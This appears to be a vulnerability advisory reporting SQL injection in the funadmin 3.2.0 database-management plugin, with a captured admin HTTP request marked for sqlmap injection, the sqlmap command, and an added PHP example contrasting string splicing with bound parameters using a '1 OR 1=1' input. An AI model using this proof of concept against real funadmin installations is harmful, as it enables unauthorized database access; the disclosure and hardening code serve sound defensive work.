find by Chaitin Security Research Lab
Vulnerability Product: funadmin
![image](https://user-images.githubusercontent.com/122217858/215309557-77269b4a-a097-44fb-86d3-e4c556a533bb.png)
Vulnerability version: .3.2.0
Vulnerability type: SQL injection
Vulnerability Details:
Database management plug-in database.php list: SQL injection vulnerability
The vulnerability occurs in a plugin: the database management plugin
Code Audit Process
![image](https://user-images.githubusercontent.com/122217858/215309573-0fd6bf28-3a59-4921-9aab-8a35ca9ec811.png)
![image](https://user-images.githubusercontent.com/122217858/215309590-b960654d-3a42-4ae2-9a36-f71498a519fc.png)
The vulnerability occurs in the
`app\databases\controller\Database.php#list` method.
It gets the id directly and splices it into the SQL statement.
Vulnerability reproduction:
Requires background administrator rights.
sqlmap PoC, saved as a txt file:
```
POST /databases/database/list?id=* HTTP/1.1
Host: 192.168.3.129:8092
Content-Length: 187
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
X-CSRF-TOKEN: d659d1ffb4e68ff1910c1c7c75a43539
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.3.129:8092
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_ce074243117e698438c49cd037b593eb=1673498041; ci_session=ca40t5m9pvlvp7gftr11qng0g0lofceq; PHPSESSID=591a908579ac738f0fc0f53d05c6aa51; think_lang=zh-cn; Hm_lvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; Hm_lpvt_8dcaf664827c0e8ae52287ebb2411aed=1674888420; auth_account=YToxOntzOjEyOiJhY2Nlc3NfdG9rZW4iO3M6MzI3OiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpJVXpJMU5pSjkuZXlKdFpXMWlaWEpmYVdRaU9qRTFORGdzSW1Gd2NHbGtJam9pSWl3aVlYQndjMlZqY21WMElqb2lJaXdpYVhOeklqb2lhSFIwY0hNNkx5OTNkM2N1Wm5WdVlXUnRhVzR1WTI5dElpd2lZWFZrSWpvaWFIUjBjSE02THk5M2QzY3VablZ1WVdSdGFXNHVZMjl0SWl3aWMyTnZjR1Z6SWpvaWNtOXNaVjloWTJObGMzTWlMQ0pwWVhRaU9qRTJOelE0T0RrMU1EQXNJbTVpWmlJNk1UWTNORGc0T1RVd01Dd2laWGh3SWpveE5qYzFOVGd3TnpBd2ZRLkJITHd5WU5nNkpVVUZmMFFucGM0aHk2YlZ1c1V6WkVqR3N2SElva0pxYU0iO30%3D; clound_account=YTo0OntzOjI6ImlkIjtpOjE1NDg7czo4OiJ1c2VybmFtZSI7czoxMDoibXlmdW5hZG1pbiI7czo4OiJuaWNrbmFtZSI7czowOiIiO3M6NjoiYXZhdGFyIjtzOjM2OiIvc3RhdGljL2Zyb250ZW5kL2ltYWdlcy9hdmF0YXIvNi5qcGciO30%3D
Connection: close

TABLE_NAME=fun_addon&ENGINE=InnoDB&TABLE_COMMENT=%E5%85%AC%E7%94%A8_%E6%8F%92%E4%BB%B6%E8%A1%A81&TABLE_ROWS=7&TABLE_COLLATION=utf8mb4_unicode_ci&token=d659d1ffb4e68ff1910c1c7c75a43539
```
![image](https://user-images.githubusercontent.com/122217858/215309621-6b1b745d-6b16-4e3e-b48c-b0693bca3f9f.png)
```
python sqlmap.py -r poc.txt
```
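
The report says the `id` request parameter is spliced directly into the SQL text. The following is an added example, not funadmin's code and not part of the original issue: it shows that pattern against a constructed in-memory SQLite table next to two hardened forms, a bound integer parameter and, going beyond the reported case, an allowlist for table names, which cannot be bound. The function names, columns, rows and input are hypothetical; only the table name `fun_addon` comes from the request above.

```php
<?php
// Added example: constructed schema and data, not funadmin's code.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE fun_addon (id INTEGER PRIMARY KEY, name TEXT)');
$pdo->exec("INSERT INTO fun_addon (name) VALUES ('database'), ('cms'), ('bbs')");

// Pattern described in the report: the request value is spliced into the SQL text.
function listSpliced(PDO $pdo, string $id): array
{
    return $pdo->query("SELECT id, name FROM fun_addon WHERE id = $id")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened, value context: validate the type, then bind the parameter.
function listBound(PDO $pdo, string $id): array
{
    if (!ctype_digit($id)) {
        throw new InvalidArgumentException('id must be a non-negative integer');
    }
    $stmt = $pdo->prepare('SELECT id, name FROM fun_addon WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened, identifier context: table names cannot be bound, so accept only
// names that already exist in the schema, then quote the identifier.
function countRows(PDO $pdo, string $table): int
{
    $known = $pdo->query("SELECT name FROM sqlite_master WHERE type = 'table'")
                 ->fetchAll(PDO::FETCH_COLUMN);
    if (!in_array($table, $known, true)) {
        throw new InvalidArgumentException('unknown table');
    }
    $quoted = '"' . str_replace('"', '""', $table) . '"';
    return (int) $pdo->query("SELECT COUNT(*) FROM $quoted")->fetchColumn();
}

$hostile = '1 OR 1=1'; // constructed input that rewrites the WHERE predicate
printf("spliced: %d rows\n", count(listSpliced($pdo, $hostile)));
printf("bound:   %d rows\n", count(listBound($pdo, '1')));
try {
    listBound($pdo, $hostile);
} catch (InvalidArgumentException $e) {
    printf("bound rejected input: %s\n", $e->getMessage());
}
printf("fun_addon rows: %d\n", countRows($pdo, 'fun_addon'));
```

With the constructed input, the spliced query returns every row in the table, while the bound version rejects the value before any SQL is executed.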